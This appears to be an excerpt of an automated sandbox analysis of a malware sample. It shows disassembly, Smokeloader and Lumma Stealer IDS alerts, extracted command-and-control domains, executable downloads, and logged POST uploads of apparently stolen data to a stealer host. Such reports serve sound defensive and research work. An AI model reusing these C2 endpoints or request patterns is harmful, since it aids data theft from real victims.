                    Source: Binary string: nss3.pdb source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr
                    Source: Binary string: mozglue.pdb source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
                    Source: Binary string: softokn3.pdb source: softokn3[1].dll.12.dr
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esi+00000910h]7_2_00427353
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]7_2_00427353
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov word ptr [eax], cx7_2_004168EF
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]7_2_00409960
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]7_2_00409960
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]7_2_00404970
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000084h]7_2_00415FE1
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then dec edx7_2_0043B050
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h7_2_00417062
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]7_2_00417062
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]7_2_00426174
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esp+54h]7_2_004381BB
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]7_2_00426271
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]7_2_00426284
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]7_2_004102B2
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]7_2_004164D2
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, 00008000h7_2_00403570
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then cmp cl, 0000002Eh7_2_00421580
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]7_2_004025A0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then cmp byte ptr [ebp+00h], 00000000h7_2_00414660
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edi, ebx7_2_00436670
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movzx ebx, byte ptr [edx]7_2_00431680
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esp+000000C0h]7_2_004106B1
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov dword ptr [esp+000005F0h], 00000000h7_2_004138D2
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]7_2_004248E0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esi+30h]7_2_00423931
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esi+30h]7_2_00423AD0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then jmp edx7_2_00422AFB
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esp+4Ch]7_2_00415AFA
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]7_2_0040CB10
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]7_2_0040FBB4
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then jmp edx7_2_0041CCD0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]7_2_00425CEE
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]7_2_00423C97
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]7_2_00433D0A
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movzx esi, word ptr [ecx]7_2_00438F15
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000084h]7_2_02136248
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then dec edx7_2_0215B2B7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h7_2_021372C9
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]7_2_021372C9
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then cmp cl, 0000002Eh7_2_021412E0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]7_2_021463DB
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then jmp edx7_2_0213D097
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movzx esi, word ptr [ecx]7_2_0215917C
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]7_2_02136739
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, 00008000h7_2_021237D7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]7_2_021464D8
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]7_2_021464EB
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]7_2_02130519
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esi+00000910h]7_2_021475BA
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]7_2_021475BA
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov word ptr [eax], cx7_2_02136B56
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]7_2_02144B47
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esi+30h]7_2_02143B98
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]7_2_02124BD7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]7_2_02129BC7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]7_2_02129BC7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]7_2_02144B47
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]7_2_02122807
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edi, ebx7_2_021568D7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then cmp byte ptr [ebp+00h], 00000000h7_2_021348C7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movzx ebx, byte ptr [edx]7_2_021518E7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esp+000000C0h]7_2_02130918
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]7_2_02153E13
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]7_2_0212FE1B
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]7_2_02143ECF
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]7_2_02143EFE
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then jmp dword ptr [004421CCh]7_2_0213CF1A
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]7_2_02145F55
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esp+000000A0h]7_2_02141C89
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then jmp edx7_2_02142D5B
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]7_2_0212CD77
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esp+4Ch]7_2_02135D61

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49708 -> 190.13.174.94:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49709 -> 190.13.174.94:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49710 -> 190.13.174.94:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49711 -> 190.13.174.94:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49712 -> 190.13.174.94:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53061 -> 190.13.174.94:80
                    Source: TrafficSnort IDS: 2052787 ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) 192.168.2.8:51397 -> 1.1.1.1:53
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53069 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53070 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53072 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53073 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53079 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53080 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53083 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53084 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53115 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53116 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53117 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53118 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53119 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53120 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53121 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53122 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53123 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53124 -> 190.147.128.172:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53125 -> 190.147.128.172:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53126 -> 190.147.128.172:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53127 -> 190.147.128.172:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53128 -> 190.147.128.172:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53129 -> 190.147.128.172:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53130 -> 190.147.128.172:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53131 -> 190.147.128.172:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53132 -> 190.147.128.172:80
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\explorer.exeNetwork Connect: 109.175.29.39 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 190.13.174.94 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 91.202.233.231 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.124 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 190.147.128.172 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 45.129.96.86 80Jump to behavior
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: boredimperissvieos.shop
                    Source: Malware configuration extractorURLs: holicisticscrarws.shop
                    Source: Malware configuration extractorURLs: sweetsquarediaslw.shop
                    Source: Malware configuration extractorURLs: plaintediousidowsko.shop
                    Source: Malware configuration extractorURLs: miniaturefinerninewjs.shop
                    Source: Malware configuration extractorURLs: zippyfinickysofwps.shop
                    Source: Malware configuration extractorURLs: obsceneclassyjuwks.shop
                    Source: Malware configuration extractorURLs: acceptabledcooeprs.shop
                    Source: Malware configuration extractorURLs: whispedwoodmoodsksl.shop
                    Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199689717899
                    Source: Malware configuration extractorURLs: http://dbfhns.in/tmp/index.php
                    Source: Malware configuration extractorURLs: http://guteyr.cc/tmp/index.php
                    Source: Malware configuration extractorURLs: http://greendag.ru/tmp/index.php
                    Source: Malware configuration extractorURLs: http://lobulraualov.in.net/tmp/index.php
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Mon, 27 May 2024 13:23:34 GMTContent-Type: application/octet-streamContent-Length: 325120Last-Modified: Mon, 27 May 2024 13:20:02 GMTConnection: keep-aliveETag: "66548882-4f600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 83 01 00 64 00 00 00 00 e0 08 00 08 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 84 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 78 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 33 0b 01 00 00 10 00 00 00 0c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 6c 00 00 00 20 01 00 00 6e 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 46 07 00 00 90 01 00 00 ce 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 a8 00 00 00 e0 08 00 00 aa 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 May 2024 13:24:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 27 May 2024 13:22:08 GMTETag: "1e5000-6196f67744000"Accept-Ranges: bytesContent-Length: 1986560Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 40 07 00 00 0c 17 00 00 00 00 00 e0 4d 07 00 00 10 00 00 00 50 07 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 1e 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 84 21 00 00 00 90 08 00 00 26 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 74 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 48 3e 07 00 00 10 00 00 00 40 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 44 29 00 00 00 50 07 00 00 2a 00 00 00 44 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 f9 11 00 00 00 80 07 00 00 00 00 00 00 6e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 84 21 00 00 00 a0 07 00 00 22 00 00 00 6e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 14 00 00 00 00 d0 07 00 00 00 00 00 00 90 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 90 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 74 96 00 00 00 f0 07 00 00 98 00 00 00 92 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 26 16 00 00 90 08 00 00 26 16 00 00 2a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 1e 00 00 00 00 00 00 50 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 23.145.40.124 23.145.40.124
                    Source: Joe Sandbox ViewIP Address: 109.175.29.39 109.175.29.39
                    Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
                    Source: Joe Sandbox ViewASN Name: TelmexColombiaSACO TelmexColombiaSACO
                    Source: Joe Sandbox ViewASN Name: BIHNETBIHNETAutonomusSystemBA BIHNETBIHNETAutonomusSystemBA
                    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: whispedwoodmoodsksl.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12841Host: whispedwoodmoodsksl.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15070Host: whispedwoodmoodsksl.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20237Host: whispedwoodmoodsksl.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5435Host: whispedwoodmoodsksl.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1206Host: whispedwoodmoodsksl.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569527Host: whispedwoodmoodsksl.shop
